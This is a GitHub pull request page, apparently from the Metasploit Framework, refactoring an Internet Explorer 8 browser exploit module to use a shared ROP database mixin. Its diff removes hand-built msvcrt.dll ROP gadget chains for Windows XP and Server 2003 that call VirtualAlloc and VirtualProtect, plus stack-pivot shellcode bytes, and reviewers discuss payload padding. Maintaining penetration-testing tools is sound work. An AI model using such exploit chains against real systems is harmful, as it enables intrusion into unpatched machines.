-
Notifications
You must be signed in to change notification settings - Fork 13.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[SeeRM 8458] Use RopDb mixin for browser exploits #2483
Changes from 5 commits
e016c9a
aea6313
67228ba
7222e3c
f4000d3
1e3b84d
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -117,77 +117,23 @@ def get_target(agent) | |
def get_payload(t, cli) | ||
rop_payload = '' | ||
|
||
# Extra junk in the end to make sure post code execution is stable. | ||
p = payload.encoded | ||
p << rand_text_alpha(12000) | ||
|
||
case t['Rop'] | ||
when :msvcrt | ||
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 | ||
chain = '' | ||
|
||
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 | ||
rop_payload = '' | ||
if t.name == 'IE 8 on Windows XP SP3' | ||
chain = | ||
[ | ||
0x77c1e844, # POP EBP # RETN [msvcrt.dll] | ||
0x77c1e844, # skip 4 bytes [msvcrt.dll] | ||
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] | ||
0xffffffff, | ||
0x77c127e5, # INC EBX # RETN [msvcrt.dll] | ||
0x77c127e5, # INC EBX # RETN [msvcrt.dll] | ||
0x77c4e0da, # POP EAX # RETN [msvcrt.dll] | ||
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) | ||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] | ||
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] | ||
0x77c34fcd, # POP EAX # RETN [msvcrt.dll] | ||
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) | ||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] | ||
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] | ||
0x77c3048a, # POP EDI # RETN [msvcrt.dll] | ||
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] | ||
0x77c46efb, # POP ESI # RETN [msvcrt.dll] | ||
0x77c2aacc, # JMP [EAX] [msvcrt.dll] | ||
0x77c3b860, # POP EAX # RETN [msvcrt.dll] | ||
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] | ||
0x77c12df9, # PUSHAD # RETN [msvcrt.dll] | ||
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] | ||
].pack("V*") | ||
|
||
rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'}) | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. it should be:
|
||
elsif t.name == 'IE 8 on Windows Server 2003' | ||
junk = rand_text_alpha(4).unpack("V")[0].to_i | ||
nop = make_nops(4).unpack("V")[0].to_i | ||
|
||
chain = | ||
[ | ||
0x77bb2563, # POP EAX # RETN | ||
0x77ba1114, # <- *&VirtualProtect() | ||
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN | ||
junk, | ||
0x77bb0c86, # XCHG EAX,ESI # RETN | ||
0x77bc9801, # POP EBP # RETN | ||
0x77be2265, # ptr to 'push esp # ret' | ||
0x77bb2563, # POP EAX # RETN | ||
0x03C0990F, | ||
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) | ||
0x77bb48d3, # POP EBX, RET | ||
0x77bf21e0, # .data | ||
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN | ||
0x77bbfc02, # POP ECX # RETN | ||
0x77bef001, # W pointer (lpOldProtect) (-> ecx) | ||
0x77bd8c04, # POP EDI # RETN | ||
0x77bd8c05, # ROP NOP (-> edi) | ||
0x77bb2563, # POP EAX # RETN | ||
0x03c0984f, | ||
0x77bdd441, # SUB EAX, 03c0940f | ||
0x77bb8285, # XCHG EAX,EDX # RETN | ||
0x77bb2563, # POP EAX # RETN | ||
nop, | ||
0x77be6591 # PUSHAD # ADD AL,0EF # RETN | ||
].pack("V*") | ||
rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'2003'}) | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. it should be:
|
||
end | ||
|
||
rop_payload = chain + algin + payload.encoded | ||
|
||
else | ||
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 | ||
code << payload.encoded | ||
code << rand_text_alpha(12000) | ||
code << p | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. It should be:
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. But honestly I dunno why this big rand_text_alpha is needed in the "java" case. I guess tries to allow the exploit to stack pivot in a more reliable way, but not sure if it's the best way. |
||
|
||
rop_payload = generate_rop_payload('java', code) | ||
end | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It's not needed always, shouldn't be done here.